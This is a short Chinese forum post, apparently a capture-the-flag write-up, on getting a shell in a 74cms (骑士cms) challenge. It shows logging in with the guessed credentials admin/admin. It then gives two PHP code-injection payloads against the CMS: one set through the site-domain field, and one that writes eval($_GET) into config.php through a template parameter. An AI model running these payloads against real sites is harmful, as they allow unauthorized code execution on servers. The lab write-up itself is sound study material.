虾虾一米六 发表于 2023-3-13 00:42:58

骑士cms01--WP

#骑士cms01


打开划到最底下发现是74cms
![](./data/attachment/forum/202303/13/004230ummapn75pv5l231m.png)
百度一下很多getshell的办法选一个
http: //127.0.0.1/index.php?m=Admin
访问后台发现需要登陆,尝试使用admin 123456发现错误然后在尝试admin ;admin发现成功登陆,
![](./data/attachment/forum/202303/13/004235bzi2h1j1g6j1bsnd.png)
将网站域名修改
http://127.0.0.1/.',phpinfo(),'/.com
再次刷新得到phpinfo()页面
![](./data/attachment/forum/202303/13/004242y3scxf0bv4r4g8xs.png)
搜索qsnctf得到flag


再来一个解法
![](./data/attachment/forum/202303/13/004248ddsm7uu95rl69s6e.png)

http: //127.0.0.1/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET),'
![](./data/attachment/forum/202303/13/004253x3rbiv2xj3yffrxi.png)
http: //127.0.0.1/Application/Home/Conf/config.php?1=phpinfo();
搜索qsnctf即可得到flag

            
页: [1]
查看完整版本: 骑士cms01--WP